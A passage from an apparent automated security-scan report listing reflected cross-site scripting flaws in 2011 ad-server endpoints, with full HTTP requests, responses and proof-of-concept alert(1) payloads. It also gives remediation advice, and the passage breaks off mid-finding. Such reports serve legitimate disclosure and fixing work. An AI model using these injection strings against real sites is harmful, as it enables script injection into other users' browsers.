document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/x;234516816;0-0;0;58298669;255-0/0;41773615/41791402/1;;~okv=;net=8e1c4';fe92e006168;~aopt=2/0/e3/0;~sscs=%3fhttp://fightglobalwarming.com">
...[SNIP]...

4.28. http://ad.doubleclick.net/adj/gm.kotaku/e3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/e3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 121ba'%3balert(1)//4948de38c85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 121ba';alert(1)//4948de38c85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/e3;ptile=1;sz=82x50;ord=99858991;mtfIFPath=/assets/vendor/doubleclick/?&121ba'%3balert(1)//4948de38c85=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 403
Date: Mon, 13 Jun 2011 11:23:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/q;242186853;0-0;0;35427945;8058-82/50;42527333/42545120/1;;~okv=;ptile=1;sz=82x50;mtfIFPath=/assets/vendor/doubleclick/?&121ba';alert(1)//4948de38c85=1;~aopt=2/0/23/0;~sscs=%3fhttp://kotaku.com/e32011">
...[SNIP]...

4.29. http://ad.doubleclick.net/adj/gm.kotaku/e3 [ptile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/e3

Issue detail

The value of the ptile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7570e'%3balert(1)//79459fa1de4 was submitted in the ptile parameter. This input was echoed as 7570e';alert(1)//79459fa1de4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/e3;ptile=7570e'%3balert(1)//79459fa1de4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 351
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:24 GMT
Expires: Mon, 13 Jun 2011 11:23:24 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/q;242186853;0-0;0;35427945;8058-82/50;42527333/42545120/1;;~okv=;ptile=7570e';alert(1)//79459fa1de4;~aopt=2/0/23/0;~sscs=%3fhttp://kotaku.com/e32011">
...[SNIP]...

4.30. http://ad.doubleclick.net/adj/gm.kotaku/pax [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/pax

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8663'%3balert(1)//2544952d3f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8663';alert(1)//2544952d3f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/pax;ptile=2;sz=82x50;ord=15641756;mtfIFPath=/assets/vendor/doubleclick/?&e8663'%3balert(1)//2544952d3f4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 353
Date: Mon, 13 Jun 2011 11:23:42 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/b;44306;0-0;0;46577859;8058-82/50;0/0/0;;~okv=;ptile=2;sz=82x50;mtfIFPath=/assets/vendor/doubleclick/?&e8663';alert(1)//2544952d3f4=1;~aopt=2/0/23/0;~sscs=%3f">
...[SNIP]...

4.31. http://ad.doubleclick.net/adj/gm.kotaku/pax [ptile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/pax

Issue detail

The value of the ptile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccf35'%3balert(1)//9bde8de0ddd was submitted in the ptile parameter. This input was echoed as ccf35';alert(1)//9bde8de0ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/pax;ptile=ccf35'%3balert(1)//9bde8de0ddd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:39 GMT
Expires: Mon, 13 Jun 2011 11:23:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/b;44306;0-0;0;46577859;8058-82/50;0/0/0;;~okv=;ptile=ccf35';alert(1)//9bde8de0ddd;~aopt=2/0/23/0;~sscs=%3f"><
...[SNIP]...

4.32. http://ad.doubleclick.net/adj/gm.kotaku/pc [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/pc

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e201'-alert(1)-'d992d7999dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/pc;ptile=9;sz=300x250;ord=45018742;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?&9e201'-alert(1)-'d992d7999dd=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732&nocache=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 371
Date: Mon, 13 Jun 2011 11:23:55 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/c;44306;0-0;0;35460738;4307-300/250;0/0/0;;~okv=;ptile=9;sz=300x250;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku;;9e201'-alert(1)-'d992d7999dd=1;~aopt=2/0/23/0;~sscs=%3f">
...[SNIP]...

4.33. http://ad.doubleclick.net/adj/gm.kotaku/pc [ptile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/pc

Issue detail

The value of the ptile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7dc'%3balert(1)//92389b75efb was submitted in the ptile parameter. This input was echoed as 5b7dc';alert(1)//92389b75efb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/pc;ptile=5b7dc'%3balert(1)//92389b75efb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732&nocache=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:50 GMT
Expires: Mon, 13 Jun 2011 11:23:50 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/i;44306;0-0;0;35460738;8058-82/50;0/0/0;;~okv=;ptile=5b7dc';alert(1)//92389b75efb;~aopt=2/0/23/0;~sscs=%3f"><
...[SNIP]...

4.34. http://ad.doubleclick.net/adj/oiq.rmx/ [click0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.rmx/

Issue detail

The value of the click0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bf9'-alert(1)-'58be3394590 was submitted in the click0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/oiq.rmx/;click0=45bf9'-alert(1)-'58be3394590 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:20:12 GMT
Expires: Mon, 13 Jun 2011 11:20:12 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/14/1c/%2a/k;227869823;0-0;0;40342997;4307-300/250;37969296/37987053/1;;~sscs=%3f45bf9'-alert(1)-'58be3394590http://owneriq.com/advertisers?src=300x250_blue">
...[SNIP]...

4.35. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91fc2"><script>alert(1)</script>25500fb9c25 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=91fc2"><script>alert(1)</script>25500fb9c25&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27438&s=27439
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:19:44 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=8175950172996030282&fpid=91fc2"><script>alert(1)</script>25500fb9c25&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.36. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d38b"><script>alert(1)</script>52781f3e18 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=1d38b"><script>alert(1)</script>52781f3e18 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27438&s=27439
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:19:44 GMT
Content-Length: 383

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=4334313441313216613&fpid=1&nu=n&t=&sp=1d38b"><script>alert(1)</script>52781f3e18&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4569b</script><script>alert(1)</script>c81f0fa8af3 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Note that the payload above never touches the double quote: it writes a literal </script>, which the HTML parser honours before the JavaScript parser ever sees the string, so backslash-escaping quotes alone would not close this finding (or 4.38 to 4.41, which use the same technique). If the value must be emitted inside a script block, encode it for the JavaScript string context in a way that also encodes <, > and / (for example as \u003c), so that the literal can never spell out a closing tag.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*4569b</script><script>alert(1)</script>c81f0fa8af3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 12:11:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
j0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*4569b</script><script>alert(1)</script>c81f0fa8af3">
...[SNIP]...

4.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af7b8</script><script>alert(1)</script>6382afb3d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*&af7b8</script><script>alert(1)</script>6382afb3d48=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 12:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2525

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*&af7b8</script><script>alert(1)</script>6382afb3d48=1">
...[SNIP]...

4.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ea4</script><script>alert(1)</script>fbf80e2f0b1 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131?click=http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*d8ea4</script><script>alert(1)</script>fbf80e2f0b1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 13:11:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
0rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*d8ea4</script><script>alert(1)</script>fbf80e2f0b1">
...[SNIP]...

4.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80241</script><script>alert(1)</script>c5dc4fefe22 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

